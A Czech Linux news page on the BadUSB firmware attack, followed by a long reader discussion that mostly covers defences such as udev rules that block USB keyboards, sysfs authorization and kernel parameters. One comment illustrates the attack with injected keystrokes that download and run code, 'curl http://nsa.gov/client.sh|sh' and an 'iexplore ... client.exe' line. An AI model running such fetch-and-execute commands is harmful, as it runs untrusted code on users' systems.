Homebrew (Wikipedie), správce balíčků pro macOS a od verze 2.0.0 také pro Linux, byl vydán ve verzi 4.5.0. Na stránce Homebrew Formulae lze procházet seznamem balíčků. K dispozici jsou také různé statistiky.
Byl vydán Mozilla Firefox 138.0. Přehled novinek v poznámkách k vydání a poznámkách k vydání pro vývojáře. Řešeny jsou rovněž bezpečnostní chyby. Nový Firefox 138 je již k dispozici také na Flathubu a Snapcraftu.
Šestnáctý ročník ne-konference jOpenSpace se koná 3. – 5. října 2025 v Hotelu Antoň v Telči. Pro účast je potřeba vyplnit registrační formulář. Ne-konference neznamená, že se organizátorům nechce připravovat program, ale naopak dává prostor všem pozvaným, aby si program sami složili z toho nejzajímavějšího, čím se v poslední době zabývají nebo co je oslovilo. Obsah, který vytvářejí všichni účastníci, se skládá z desetiminutových
… více »Richard Stallman přednáší ve středu 7. května od 16:30 na Technické univerzitě v Liberci o vlivu technologií na svobodu. Přednáška je určená jak odborné tak laické veřejnosti.
Jean-Baptiste Mardelle se v příspěvku na blogu rozepsal o novinkám v nejnovější verzi 25.04.0 editoru videa Kdenlive (Wikipedie). Ke stažení také na Flathubu.
TmuxAI (GitHub) je AI asistent pro práci v terminálu. Vyžaduje účet na OpenRouter.
Byla vydána nová verze R14.1.4 desktopového prostředí Trinity Desktop Environment (TDE, fork KDE 3.5, Wikipedie). Přehled novinek i s náhledy v poznámkách k vydání. Podrobný přehled v Changelogu.
Bylo vydáno OpenBSD 7.7. Opět bez písničky.
V Tiraně proběhl letošní Linux App Summit (LAS) (Mastodon). Zatím nesestříhané videozáznamy přednášek jsou k dispozici na YouTube.
V srpnu na konferenci Black Hat USA 2014 představili Karsten Nohl a Jakob Lell relativně nový typ útoku, kdy lze ke kompromitaci počítače použít libovolné USB zařízení (pdf, YouTube). Útok byl pojmenován dle názvu přednášky BadUSB a spočívá v přeprogramování firmwaru USB zařízení. Minulý týden na konferenci DerbyCon 4.0 o BadUSB přednášeli Adam Caudill a Brandon Wilson (YouTube). Na rozdíl od předchozí dvojice se ale tato dvojice rozhodla zveřejnit zdrojový kód (GitHub).
Tiskni
Sdílej:
Jak útok probíháDo řadiče USB flashdisku je nahrán alternativní firmware, který občas po připojení emuluje klávesnici, která namačká buď
Win+R, iexplore http://nsa.gov/client.exe, Enter, Enter, Enter
, nebo Alt+F2, curl http://nsa.gov/client.sh|sh, Enter
, nebo obecný shell payload.
jestli je to jen záležitost WindowsJe to záležitostí všech sračkových operačních systémů, které po připojení USB klávesnice z této automaticky začnou číst klávesy. Tedy i Linuxu, pokud si ho nějak extra nepatchneš. Proti necílenému útoku by mohlo pomoci mít nestandardní klávesové zkratky a doufat, že se to nespustí zrovna když jsi v terminálu.
jo, to by mi přišlo jako celkem rozumný způsob, první připojená klávesnice bez dotazu a při druhé a další dotaz požadovat potvrzení,To je dobre reseni az do okamziku, kdy se vam jedna klavesnice rozbije, budete chtit pripojit nahradni a ta rozbita je pevne integrovana (jako napr. u notebooku).
zároveň mi taky nic nebereNeklesá vám číslo "peněz na účtu celkem". To "nebere" je sporné - jestli banka díky těm penězům něco vydělává (což vydělává a nebude to málo), tak by vám z toho mělo něco kápnout, ne? Třeba aspoň dorovnání inflace.
Neklesá vám číslo "peněz na účtu celkem". To "nebere" je sporné - jestli banka díky těm penězům něco vydělává (což vydělává a nebude to málo), tak by vám z toho mělo něco kápnout, ne? Třeba aspoň dorovnání inflace.Viz ta první věta;
Já dostávám nějaké drobnéTo je něco jako softwarové pirátství - pro mě je to co s těma penězma banka dělá naprosto virtuální a v podstatě se mě to vůbec netýká. Spokojím se s tím, že mi poskytuje služby, které od ní očekávám, že je pojištěná a že jsou tam obecně peníze bezpečnější, než u mě doma pod postelí. Samozřejmě, je hezké, když mi jednou měsíčně přičtou dvacet halířů, ale v podstatě mě to ani nezajímá. V objemech toků peněz, které každý den utrácím a které dostávám od zaměstnavatele je to v podstatě neviditelná částka.
Spokojím se s tím, že mi poskytuje služby, které od ní očekávám, že je pojištěná a že jsou tam obecně peníze bezpečnější, než u mě doma pod postelí.Je fajn, že se spokojíte, ale to nic nemění na tom, že služby nedostáváte zadarmo. Cena těch služeb je rozdíl mezi penězmi, které váš vklad do banky té bance vydělal, a penězmi, které jste za to dostal (těch pár halířů). Že ten rozdíl nikdy nevidíte jako částku na výpisu z účtu, na věci taky nic nemění. Banka má samozřejmě nějaké náklady, takže vám nikdy nemůže dát všechno, co váš vklad vydělal. No a mezi ty náklady se počítají i peníze, o které banka přijde kvůli viz #48
Pokud se nekdo nechce nechat vykoristovat, nemusi techto sluzeb vyuzivat.A může zcela svobodně bydlet v jeskyni... oh wait, ani to nemůže.
Cena těch služeb je rozdíl mezi penězmi, které váš vklad do banky té bance vydělal,To je ale krajne uhozena argumentace. Vychazi z implicitniho predpokladu, ze onen zisk je prirozeny a automaticky dusledek toho vkladu a banka ho jen shrabne 'bez namahy'. Ve skutecnosti banka k zisku potrebuje minimalne ctyri veci: 1) kapital - ten primarne poskytuji investori 2) likviditu - tu primarne poskytuji vkladatele 3) investicni prilezitosti 4) infrastrukturu a know-how Samotne penize od vkladatelu zadny vynos neudelaji. A protoze v soucasne situaci maji banky obecne likvidity nadbytek (relativne k ostatnim faktorum), tak jeji mezni uzitecnost je mala a banky tedy nepotrebuji lakat dalsi vkladatele velkymi vynosy. Pokud ma smysl nejake jine meritko ceny, tak je to cena uslych prilezitosti. Tedy vynos, ktery by si ty sam s tema penezma mohl udelat, kdybys je nevlozil do banky. Jenze to je ve vetsine pripadu nominalni nula.
To je ale krajne uhozena argumentace. Vychazi z implicitniho predpokladu, ze onen zisk je prirozeny a automaticky dusledek toho vkladu a banka ho jen shrabne 'bez namahy'.Ten předpoklad jste si nicméně do mého příspěvku doplnil vy (a to, že je implicitní, je váš názor.) Já nic takového netvrdil
Cena těch služeb je rozdíl mezi penězmi, které váš vklad do banky té bance vydělal, a penězmi, které jste za to dostal (těch pár halířů).Zapoměl jste odečíst cenu práce. Ano, ono to stojí (nejen) něco lidských zdrojů, aby ten vklad do banky něco vydělal. A jen pro srovnání si představte, kolik lidských zdrojů by to stálo, kdybyste si to aby vaše vklady vydělávaly řešit sám. Takže si to shrneme: banka nabízí produkt, investuje do něj něj nějakou práci a má z toho nějaký zisk. Na vás je, jestli ten produkt je pro vás výhodný, bez ohledu na to, kolik ta banka z toho má. Pokud se najde dost lidí, kteří přejdou k bance která více svého zisku vrací a pokud to bude stále finančně výhodné pro tu banku (bude mít víc klientů), tak taková banka vznikne. To jsou pravidla trhu. Vezměme si jiný příklad. Pokud budou stejnou trasou jezdit dva dopravci. Jeden bude mít jízdné 100 Kč a při tom marží 1Kč. Druhý bude mít jízdné 50Kč a marži 40Kč (podaří se mu získat nějakou dotaci od státu, nebo tak něco). Kterého si vyberete? Toho s nižší marží?
Zapoměl jste odečíst cenu práce.Ta podle mě nebyla zahrnuta v tom které váš vklad do banky té bance vydělal, tj. mluvil o čistém zisku. Zbytek příspěvku mi přijde, že vůbec nereaguje na trekkera. Můžeš to zkusit upřesnit?
Pokud se najde dost lidí, kteří přejdou k bance která více svého zisku vrací a pokud to bude stále finančně výhodné pro tu banku (bude mít víc klientů), tak taková banka vznikne.Pokud jí v tom nebrání zákon - např. kdyby existoval zákon, který by nařizoval bance ukradené peníze hradit. Existuje? Nějaké rozsudky v tom smyslu tu už myslím byly.
Zapoměl jste odečíst cenu práce.Nezapomněl. Výdělek z vkladu zákazníka je pro banku příjem, do kterého se cena práce nazapočítává. Ta (a ostatní náklady) se počítá až do zisku, o kterém jsem ale nemluvil.
a zbytečná ad hominem na Jednu...Mě hlavně překvapilo, že ví, že mám uhry. Nemám je totiž v obličeji…
A co kdyz uzivatel nebude mit pripojenou mys a ani jine zarizeni?Zobrazí se: Pro aktivaci klávesnice na ní napište "bablbam". Malware na USB klíčence náhodné slovo z obrazovky nepřečte.
Uzivatel by nepochopil, ze se jedna o bezpecnostni vec, jen by si rekl, jak je ten Linux hloupy.Nevadí mi používat (bezpečný) systém, i když si o něm BFU budou myslet, že je hloupý.
A zobrazi sa to kedy a kde? A kde sa to bude zobrazovat - na konzole? V X11?Na konzoli, v Xkách… podle toho, kde uživatel bude.
Pri kazdom boote systemu? Alebo si to bude pamatat, ktore klavesnice su povolene (podla coho - vacsina klavesnic nema v sebe seriove cislo)?USB ID může útočník fejkovat (pokud trefí stejného výrobce a model klávesnice), ale systém kromě toho vidí, do kterého portu, případně k jakému hubu je klávesnice připojena. Takže pokud uživatel nebude klávesnici přehazovat mezi USB porty, nemusí se to pokaždé ptát.
USB ID může útočník fejkovat (pokud trefí stejného výrobce a model klávesnice), ale systém kromě toho vidí, do kterého portu, případně k jakému hubu je klávesnice připojena. Takže pokud uživatel nebude klávesnici přehazovat mezi USB porty, nemusí se to pokaždé ptát.Co si prostě rozdělit porty podle zařízení? Tzn vepředu na počítači mít porty třeba jen na mass storage a na nic jiného. Sice to nepomůže v případech ala "podvodná myš", ale vyřeší to půlku problému s podvodnými flashdisky, kterých bych se bál podstatně víc.
Vite, normalni clovek (ne uhrovity geek chodici do hackerspacu) ale ocekava, ze bude moci na klavesnici psat hned po pripojeni.Nejde to prostě bezpečně udělat. Stejně, jako nejde třeba bezpečně automaticky spouštět binárky z webových stránek. Prostě tam bude stejné vyskakovací okno jako když ve windowsech klikneš na neznámé .exe - Are you sure? Yes, no.
Tedy i Linuxu, pokud si ho nějak extra nepatchneš.Nestačilo by pravidlo do udevu?
udev
obsluhovat mohl, nejspíš přes nějaký soubor v /sys
. Šlo by tím nejen zajistit ochranu proti potvorám jako BadUSB, ale například také "zamknutí" všech vstupních zařízení, například podle toho, jestli je nějaké zařízení přítomné nebo ne.
Pro grafická prostředí by pak stačilo poslat zprávu skrz DBus, kde by naslouchal program, co by se na neznámé vstupní zařízení zeptal uživatele, který by ho následně mohl povolit (a nechat zapsat do seznamu povolených), povololit dočasně nebo ignorovat.
To by nejspíš u vstupních zařízení nepomohlo, vstupní vrstva začne pracovat hned, jak ze zařízení nahozeno.Viz tady - ten člověk sice řeší keymap, ale podobným způsobem by imho šlo zabránit takovým útokům... Zásah do jádra mi přijde overkill, spíš ten udev a/nebo xinput vrstva...
To by mohlo fungovat - i když by zařízení dál posílalo události stisků kláves, tak pokud by namapovaly "do nikam", byl by efekt stejný jako zahození. On to vlastně je "zásah do jádra", ale přes mechanismus, který tam už je.Přesně tak, IMHO už veškerá potřebná funkcionalita v jádře a v udevu je. IIRC nemusíš ani dělat hack s keymapem, mělo by jít usb zařízení odpojit zápisem vhodné hodnoty někam do
/sys/bus/usb/
, ačkoli teď hned z hlavy nevim, co konkrétně zapsat kam...
echo 1 > /sys/bus/usb/devices/$USB_PATH/remove
Tohle u mě funguje a dá se to s trochou RTFM nechat zavolat z udev pravidla. IIRC by také mělo být možné požádat udev po D-Busu, aby něco odpojil, to koneckonců DE běžně dělají. Tzn. jediné, co zbývá, je napsat pár vhodných pravidel a přívětivé rozhraní /sys/bus/usb/device/.../authorized
(viz dokumentace jádra, je to hned ze začátku), tak zařízení zakázáno a ovladače ho nemohou používat. Je to původně pro použití s bezdrátovými USB zařízenímy, ale funguje to i u normálních "drátových" (je myšleno na úrovni protokolu, myš s přijímačem v USB je z tohoto pohledu stále "drátová"). Tudíž by stačilo udev
pravidlo, které by všechna HID zařízení po připojení zakázala a znovu je autorizovala až po ověření uživatelem.
Nebo - pro maximální paranoiky a/nebo ty s PS/2 zařízeními - patchnout jádro, aby byla všechna HID zařízení defaultně neautorizovaná a musela se povolit dodatečně.
drivers/usb/core/hcd.c
ukáže, že jádno netřeba patchovat (teda pokud nevadí, že to vypne všechny USB zařízení a ne jen HID, což asi stejně není od věci).
/* authorized_default behaviour:
* -1 is authorized for all devices except wireless (old behaviour)
* 0 is unauthorized for all devices
* 1 is authorized for all devices
*/
static int authorized_default = -1;
module_param(authorized_default, int, S_IRUGO|S_IWUSR);
MODULE_PARM_DESC(authorized_default,
"Default USB device authorization: 0 is not authorized, 1 is "
"authorized, -1 is authorized except for wireless USB (default, "
"old behaviour");
Dává se to jako parametr modulu usbcore (warning: netestoval jsem to).Nicméně by šlo dodělat dodatečnou vrstvu do jádraMně by na destopu stačilo, kdyby se to řešilo v Xkách. (k serverům jednak většinou nepřipojuju USB zařízení, druhak tam nebývá aktivní session)
GreyDaemon ~ # cat /etc/udev/rules.d/blockusbhid.rules ACTION=="add", ATTR{bInterfaceClass}=="03" RUN+="/bin/sh -c 'echo 0 >/sys$DEVPATH/../authorized'"Problem solved. A vubec, kdyz zamykam screen spoustim:
sysctl -w kernel.grsecurity.deny_new_usb=1
Bezpecnostni problem ma v podstate 2 casti:
1. jak se muze infikovat firmware flashdisku:
Na linuxu je potreba root. Na windows je asi admin kazdy, ze?
2. jak muze flashka s infikovanym firmware ohrozit vas PC:
Prvnim utocnym vektorem, ktery se nabizi, je modifikace/infikovani souboru ukladanych na flashdisk. Dalsi moznosti utoku je chovat se jako jine zarizeni krome uloziste (jak popsali nademnou). Nekde na mailing listech se diskutovala jeste moznost modifikovat bezici OS pomoci DMA, ale samotna USB zarizeni nemuzou iniciovat DMA, takze by takovy utok byl nesmirne komplikovany.
Na windows je asi admin kazdy, ze?Už ne, tuhle část UNIXu po několika desítkách let zvládli okopírotvat...
Zas na druhej strane windows manager uz z principu potrebuje ovladat vsetky okna, takze ak by sa to malo nejak vyriesit, tak window manager by tiez musel mat rovnako silne prava ako nejak ta ad-hoc aplikacia na potvrenie ci chces vykonat danu operaciu.Ne, citlivý dialog může dočasně WM zablokovat. Tohle je prostě celé blbě. Podívejte se na Qubes OS, jak to má vypadat.
Ne, citlivý dialog může dočasně WM zablokovat.No ak nieco zastavi bez WM procesu, tak vsetky veci ako oramovanie okna a tlacidka na jeho zavretie prestanu fungovat... To tiez nie je dobre.
Jedna vec je duveryhodnost a druha vec je zranitelnost/exploitovatelnost.Aha. Tou „nedůvěryhodností“ jsem myslel normální aplikaci, kterou útočník exploitnul. Zmatení pojmů, pardon.
Pokud vam pripada pravdepodobnost exploitnuti prilis vysoka, jsou ruzne zpusoby jak appku sandboxovat a podporu ze strany Xserveru k tomu nepotrebujete.Potřebuju, protože když jí dám přístup na X server, může číst klávesy, schránku, screenshotovat a posílat keystroky ostatním aplikacím. Jsou proti tomu pochybná rozšíření do X.
No pokud je u nejake appky riziko tak velke, tak bych ji ani nedaval pristup k X serveru.Browser, prohlížeč obrázků, PDF nebo přehrávač videa se dneska blbě spouští bez X serveru.
pousta aplikaci vyuziva cteni klaves, schranku, screenshotovani atd.U mně čte (oprávněně) klávesy jenom WM a schránku a screenshoty si můžu managovat bokem. Jak říkám, koukni na ten QubesOS.
Browser, prohlížeč obrázků, PDF nebo přehrávač videa se dneska blbě spouští bez X serveru.Lze pouzit treba Xephyr apod., nebo rovnou virtualni masinu.
U mně čte (oprávněně) klávesy jenom WM a schránku a screenshoty si můžu managovat bokem. Jak říkám, koukni na ten QubesOS.QubesOS znam, jde do extremu s virtualkama.
/dev/tty12
). Uživatel uvidí, jako co je vložené zařízení detekováno a bude jasné, že pokud se například flashdisk ohlásí jako složené zařízení obsahující jedno mass storage a dvě HID, tak je nejspíš nakažené. Další výhoda neaktivního terminálu je to, že jakékliv akce s vyjímklou přepnutí terminálu a věcí typu Magic SysRq key
nebo Ctr+Al+Del
a spol. jsou ignorováný a navíc je uživatel uvidí.
Bohužel tato taktika selhává, pokud je zařízení už rovnou vstupní (jako Trójská myš) nebo začne své akce provádět až po nějaké době. Jediná obrana proti tomu by bylo mít "karanténí počítač", nejlépe nějaký systém nabootovaný z read-only média jako LiveCD, nepřipojenký k síti a nejlépe i ne-x86 (optimálně nějaká embedded deska s ARMem). Pokud by se k tomu přidala detekce veškerých vstupních odálostí (jako evtest
, ale pro všechny existující zařízení) a nechalo se to běžet dostatečně dlouho (minimálně den), tak je velmi pravděpodobné, že by se tím odhalila většina infikovaných zařízení. Bylo by sice možné se takovéto detekci vyhnout, ale takto "opatrné" infikované zařízení by svou "infekci" šířilo jen velmi pomalu (u mallwaru není K-strategie moc výhodná).
Nebo mi nCo mi uniká? V čem je tenhle útok nový?Tak jak to chápu já; Nové je to v tom, že to aktivně útočí na flashdisky, do kterých nahrává upravený firmware. Dřívější útoky byly spíš stylem speciálně zkonstruovaného zařízení (například té myši), které po připojení počítač napadly. Nyní v podstatě libovolný flashdisk může představovat riziko, protože nezjistíš, jestli je nakažený nebo ne pouhým scannem jeho obsahu (infikovaný je řadič, ne diskový prostor).
Nebo mi nCo mi uniká? V čem je tenhle útok nový?Dřív ti musel útočník dát přímo zařízení, které uvnitř mělo HW na tohle. Teď to umí reflashnout různá zařízení bez fyzické úpravy útočníkem.
Jediná obrana je zřejmě brát produkty od známých výrobců, u kterých by ztráta pověsti přinesla větší ztráty než by byly nějaké zisky z podobných podvodů.Například od Sony nebo od Cisca.
Problém s tím, že se např. flashka začne chovat jako klávesnice, myš nebo kdo ví co, je celkem jednoduchá.
Tohle by nefungovalo, protože potom by přišel nějaký tydíít a začal by vysvětlovat, proč se USB 3G bazmek musí chovat nejdřív jako USB Mass Storage a až potom jako síťové zařízení (Pro vysvětlení, narážím tím na to, že místo toho, aby ta usb věc byla standardní a podporovaná by default, tak se na tu USB Storage část dává (beznadějně) zastaralý ovladač, který se nejdřív pokusí nainstalovat a potom ono zařízení přepne na 3G modem.)
Stejně tak myši, co jsou myši a současně usb mass storage. Uživatelé by vám vysvětlili, jak úžasná je to věc a jak moc tomu nerozumíte. (Pro vysvětlení: na tu usb storage část se ukládá .... konfigurace toho hw. Proč se konfigurace toho hw nemůže uložit do toho hw samotného, jak je desítky let zvykem je mi "záhadou". Ale dneska je asi lepší mít konfiguraci v usb mass storage na fatce a ve speciálním ovladači si ji přečíst a potom přes ovladač ovlivnit chování onoho hw.)
A vůbec, proč se bránit, když avirové firmy chtějí vydělávat. Tak jim to dopřejme, ne?
ZADNY uzivatel naprosto NIKDY nesmi nic takovyho videt.Tohle je ta nejvetsi demence. Spravne reseni by bylo, kdyby to slo vypnout celkem jednoduse, pouze s dostatecnym varovanim. (A v nejmenovanem OS by na to melo byt API, ktere bude moct vyuzit antivir. At se snazi antivirove firmy, je to jejich job.) Mezi uzivateli at se siri co chce, dle jejich (ne)inteligence. Ale ve firmach, at je to na administratorovi, co povoli, co zakaze, a nebo jestli necha na uzivatelove zodpovednosti (pomoci vyse zmineneho dialogu), ze s tim pocitacem neco udela. Pripojit flashku a odnest si praci domu chce docela dost lidi, a porad je to lepsi nez si stomegove soubory posilat mejlem.
ZADNY uzivatel naprosto NIKDY nesmi nic takovyho videt.Nejspíš podle tebe nejsem uživatel, tak s dovolením budu používat systém, který není pro takové uživatele. Jsou dle tebe špatné i hlášky když klikneš třeba na takovýto link, měl by to prohlížeč rovnou automaticky spustit?
Ano, jde to udělat s jakýkoli HW. Ale je rozumné chtít po operačním systému, aby uměl připojit bezpečně např. něco, co na první pohled vypadá (podle obalu) jako USB Flash. Tedy se uživatele zeptal "Připojujete poprvé nové zařízení typu klávesnice. Opravdu tak chcete učinit?".
Což je úplně nejvtipnější, když žádná jiná klávesnice (ani krysa) k systému připojená není a uživatel nemá jak připojení klávesnice potvrdit .